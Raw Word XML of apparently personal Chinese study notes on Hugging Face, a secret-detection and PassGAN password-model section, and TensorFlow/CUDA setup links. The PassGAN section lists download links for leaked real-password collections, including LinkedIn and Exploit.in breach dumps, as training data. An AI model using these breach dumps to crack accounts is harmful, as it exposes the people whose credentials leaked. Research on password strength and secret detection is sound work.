      <w:bookmarkStart w:id="799" w:name="_Toc159780220"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Hugging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Face</w:t>
      </w:r>
      <w:bookmarkEnd w:id="799"/>
    </w:p>
    <w:p w14:paraId="62AD6697" w14:textId="22ECBC9E" w:rsidR="00F3302E" w:rsidRDefault="00F3302E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0CCB98" w14:textId="77777777" w:rsidR="004F7AC9" w:rsidRDefault="004F7AC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E24A34D" w14:textId="78EC790C" w:rsidR="00D0490F" w:rsidRDefault="004F7AC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004F7AC9">
        <w:t>https://github.com/huggingface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FA220C" w14:textId="101F3851" w:rsidR="00D0490F" w:rsidRDefault="00D512B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D512B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Jax, PyTorch </w:t>
      </w:r>
      <w:r w:rsidRPr="00D512B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00D512B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TensorFlow </w:t>
      </w:r>
      <w:r w:rsidRPr="00D512B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00D512B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D512B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并与之无缝整合。你可以直接使用一个框架训练你的模型然</w:t>
      </w:r>
      <w:r w:rsidRPr="00D512B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>后用另一个加载和推理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC64C8" w14:textId="7D734151" w:rsidR="00F3302E" w:rsidRDefault="00F3302E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499DB982" w14:textId="6379726A" w:rsidR="00F3302E" w:rsidRDefault="002D7D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>face</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D7D95">
        <w:t>https://huggingface.co/models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF836EC" w14:textId="452726CC" w:rsidR="00DF1A27" w:rsidRDefault="00DF1A27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A08353B" w14:textId="77EED918" w:rsidR="002D7D95" w:rsidRDefault="002D7D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210B648F" w14:textId="4D1D78B9" w:rsidR="002D7D95" w:rsidRDefault="002D7D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EAD2293" w14:textId="53146BA5" w:rsidR="002D7D95" w:rsidRDefault="002D7D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517277BA" w14:textId="2F67EBCB" w:rsidR="002D7D95" w:rsidRDefault="002D7D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40CDA0B0" w14:textId="77777777" w:rsidR="002D7D95" w:rsidRDefault="002D7D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675CCE5C" w14:textId="6E659355" w:rsidR="00DF1A27" w:rsidRDefault="00DF1A27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D22402" w14:textId="1DBC2B95" w:rsidR="00DF1A27" w:rsidRDefault="00DF1A27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E0B836" w14:textId="77777777" w:rsidR="00DF1A27" w:rsidRDefault="00DF1A27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5E6BA5" w14:textId="56C1CFC1" w:rsidR="001D10B3" w:rsidRDefault="001D10B3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="800" w:name="_Toc159780221"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>ecretDetection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>训练</w:t>
      </w:r>
      <w:bookmarkEnd w:id="800"/>
    </w:p>
    <w:p w14:paraId="75AFE9CC" w14:textId="6F2D9453" w:rsidR="001D10B3" w:rsidRDefault="001D10B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A02C7D" w14:textId="717A2C26" w:rsidR="00D83FD4" w:rsidRDefault="00D83FD4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>DeepPass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FC9667" w14:textId="05D061A4" w:rsidR="00D83FD4" w:rsidRDefault="00D83FD4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D83FD4">
        <w:t>https://posts.specterops.io/deeppass-finding-passwords-with-deep-learning-4d31c534cd00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D986BB" w14:textId="076A0633" w:rsidR="00BD59D1" w:rsidRDefault="00BD59D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097C8050" w14:textId="50913D8F" w:rsidR="00D971FE" w:rsidRDefault="00D971FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF36F36" w14:textId="75CBD694" w:rsidR="00F66BF3" w:rsidRDefault="00F66BF3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6010F7" w14:textId="64EC193E" w:rsidR="00D971FE" w:rsidRDefault="00F66BF3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F66BF3">
        <w:t>https://github.com/brannondorsey/PassGAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5360B575" w14:textId="5865D819" w:rsidR="00BD59D1" w:rsidRDefault="00BD59D1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="801" w:name="_Toc159780222"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>训练数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="801"/>
    </w:p>
    <w:p w14:paraId="329D8576" w14:textId="6921EAA6" w:rsidR="009434CA" w:rsidRDefault="009434CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>真实人类泄露的密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071FAE9F" w14:textId="057347FE" w:rsidR="009434CA" w:rsidRDefault="009434CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00421B72">
        <w:t>realhuman_phill.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C246FE" w14:textId="609928A6" w:rsidR="00421B72" w:rsidRDefault="009434CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009434CA">
        <w:t>https://crackstation.net/files/crackstation-human-only.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E13C617" w14:textId="04D9B876" w:rsidR="00BD59D1" w:rsidRDefault="00BD59D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB5B6A0" w14:textId="240D5C19" w:rsidR="00781D66" w:rsidRDefault="005661E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LinkedIn </w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄漏（</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7GB </w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩，直接下载。来自</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Hashes.org</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的镜像）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC93A4" w14:textId="77777777" w:rsidR="000F6197" w:rsidRDefault="000F6197" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F6197">
        <w:t>https://github.com/brannondorsey/PassGAN/releases/download/data/68_linkedin_found_hash_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F244620" w14:textId="3DAA113E" w:rsidR="00426F4E" w:rsidRDefault="00426F4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>passGAN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的范例的训练数据集</w:t>
      </w:r>
      <w:r w:rsidR="006C4888">
        <w:t>(165MB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D2D028" w14:textId="2178B77F" w:rsidR="000F6197" w:rsidRDefault="00426F4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00426F4E">
        <w:t>https://github.com/brannondorsey/PassGAN/releases/download/data/rockyou-train.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E46A8C" w14:textId="77777777" w:rsidR="000F6197" w:rsidRDefault="000F6197" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2C12DC" w14:textId="421E80A2" w:rsidR="00781D66" w:rsidRDefault="005661E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exploit.in torrent</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10GB+</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>亿个账户。声名狼藉！）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA2A4C3" w14:textId="089A03AF" w:rsidR="000F6197" w:rsidRDefault="000F6197" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F6197">
        <w:t>https://thepiratebay.org/torrent/16016494/exploit.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B7975B" w14:textId="77777777" w:rsidR="000F6197" w:rsidRDefault="000F6197" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F86450F" w14:textId="66B4508B" w:rsidR="00781D66" w:rsidRDefault="005661E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Hashes.org</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：很棒的共享密码恢复站点。如果您有资源，请考虑捐赠</w:t>
      </w:r>
      <w:r w:rsidR="00781D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B6CBE2" w14:textId="571960A2" w:rsidR="000F6197" w:rsidRDefault="000F6197" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F6197">
        <w:t>https://hashes.org/leaks.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18487A56" w14:textId="77777777" w:rsidR="00781D66" w:rsidRDefault="00781D66" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE8173C" w14:textId="36A54DD8" w:rsidR="00BD59D1" w:rsidRDefault="00BD59D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7C1F34" w14:textId="0401B4EC" w:rsidR="00BD59D1" w:rsidRDefault="00BD59D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5086688C" w14:textId="21188392" w:rsidR="00ED1E35" w:rsidRDefault="00ED1E35" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="802" w:name="_Toc159780223"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>assGAN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="802"/>
    </w:p>
    <w:p w14:paraId="08BD8AC1" w14:textId="3E98D461" w:rsidR="00ED1E35" w:rsidRDefault="00ED1E35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081855FF" w14:textId="5535777E" w:rsidR="00EC4A9B" w:rsidRDefault="00EC4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC4A9B">
        <w:t>https://github.com/brannondorsey/PassGAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F360751" w14:textId="48E19B38" w:rsidR="00EC4A9B" w:rsidRDefault="00EC4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120C86AB" w14:textId="3A6F5246" w:rsidR="00634B1C" w:rsidRDefault="00634B1C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0E1D4B" w14:textId="77777777" w:rsidR="00634B1C" w:rsidRPr="00EC4A9B" w:rsidRDefault="00634B1C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16140B53" w14:textId="77777777" w:rsidR="00B02CB5" w:rsidRDefault="00614C68" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>论文：康奈尔大学的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4CF081" w14:textId="4D5D79BC" w:rsidR="00EC4A9B" w:rsidRDefault="00614C68" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00614C68">
        <w:t>https://arxiv.org/abs/1709.00440</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360DE39C" w14:textId="255B9C33" w:rsidR="00EC4A9B" w:rsidRPr="00614C68" w:rsidRDefault="00B02CB5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B02CB5">
        <w:t>https://arxiv.org/abs/1704.00028</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6632E275" w14:textId="470E21C4" w:rsidR="00EC4A9B" w:rsidRDefault="00B02CB5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B02CB5">
        <w:t>https://github.com/igul222/improved_wgan_training</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692BB7B6" w14:textId="1616033E" w:rsidR="00EC4A9B" w:rsidRDefault="00EC4A9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65871A04" w14:textId="56DDDFFC" w:rsidR="00D449FC" w:rsidRDefault="00D449FC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E699B8" w14:textId="54D6EE52" w:rsidR="00095213" w:rsidRDefault="006478F2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GAN</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成对抗网络模型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B3C155" w14:textId="0B9D37DA" w:rsidR="00095213" w:rsidRDefault="00095213" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297459CF" w14:textId="3FB1CA5F" w:rsidR="00A02CE1" w:rsidRDefault="00A02CE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771A34AE" w14:textId="00CE764E" w:rsidR="00095213" w:rsidRDefault="00A02CE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A02CE1">
        <w:t>https://zhuanlan.zhihu.com/p/34287744</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E1543D" w14:textId="0469A43F" w:rsidR="00095213" w:rsidRDefault="00095213" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CEB091" w14:textId="22AD7A14" w:rsidR="00095213" w:rsidRDefault="00095213" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74310364" w14:textId="175C0107" w:rsidR="00A02CE1" w:rsidRDefault="00A02CE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA01A06" w14:textId="77777777" w:rsidR="00A02CE1" w:rsidRDefault="00A02CE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6307F243" w14:textId="42E5E854" w:rsidR="00095213" w:rsidRDefault="00095213" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090EBF40" w14:textId="15CBC0D6" w:rsidR="00095213" w:rsidRDefault="00095213" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B18944" w14:textId="69EBC008" w:rsidR="00095213" w:rsidRDefault="00095213" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1432D3F1" w14:textId="7CF980A4" w:rsidR="00095213" w:rsidRDefault="00095213" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC90759" w14:textId="5D2B86DF" w:rsidR="00095213" w:rsidRDefault="00095213" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F5FB00" w14:textId="0D87BC6D" w:rsidR="00C12266" w:rsidRDefault="00AC4C3B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="803" w:name="_Toc159780224"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>ensorflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="803"/>
    </w:p>
    <w:p w14:paraId="2B049EF7" w14:textId="5343B647" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B4B27C" w14:textId="6CE419CE" w:rsidR="002C54A2" w:rsidRDefault="002C54A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pytorch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的共同点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BEE907" w14:textId="223837CF" w:rsidR="002C54A2" w:rsidRDefault="002F3931" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002F3931">
        <w:t>https://neptune.ai/blog/installing-tensorflow-2-gpu-guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434B81B9" w14:textId="57657DAD" w:rsidR="002C54A2" w:rsidRDefault="002F3931" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21B6D324" wp14:editId="2F7B1EDB">
            <wp:extent cx="5274310" cy="112458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74310" cy="1124585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B532539" w14:textId="4D86962D" w:rsidR="00234723" w:rsidRDefault="002F3931" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002F3931">
        <w:t>https://medium.com/analytics-vidhya/install-cuda-11-2-cudnn-8-1-0-and-python-3-9-on-rtx3090-for-deep-learning-fcf96c95f7a1#:~:text=If%20we%20want%20to%20fully,Conda%20environment%20with%20python%203.9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFCF234" w14:textId="026018E8" w:rsidR="002F3931" w:rsidRDefault="00034CA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00034CA2">
        <w:t>Install CUDA 11.2, cuDNN 8.1.0, PyTorch v1.8.0 (or v1.9.0), and python 3.9 on RTX3090 for deep learning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7B622C" w14:textId="0A71E816" w:rsidR="002F3931" w:rsidRDefault="002F3931" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE14D03" w14:textId="34544EB2" w:rsidR="002F3931" w:rsidRDefault="002F3931" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215BDE01" w14:textId="77777777" w:rsidR="002F3931" w:rsidRDefault="002F3931" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
